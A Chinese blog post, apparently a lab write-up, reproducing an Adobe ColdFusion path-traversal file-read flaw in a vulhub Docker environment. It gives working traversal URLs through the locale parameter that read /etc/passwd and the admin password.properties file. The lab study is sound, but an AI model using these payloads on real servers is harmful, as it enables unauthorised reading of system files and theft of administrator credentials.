其他分享
首页 > 其他分享> > Adobe ColdFusion 文件读取漏洞复现

Adobe ColdFusion 文件读取漏洞复现

作者:互联网

Adobe ColdFusion 文件读取漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

image-20210403215709036

查看开启的端口号

docker-compose ps

image-20210403215800845

监听了8500端口,访问http://target_ip:8500/CFIDE/administrator/enter.cfm

image-20210403215948387

默认密码为admin

0x02.漏洞复现

访问http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

image-20210403220413440

读取后台管理密码http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

image-20210403220527991

标签:8500,administrator,cfm,Adobe,..,ColdFusion,ip,复现,http
来源: https://www.cnblogs.com/-Anguvia-/p/14615131.html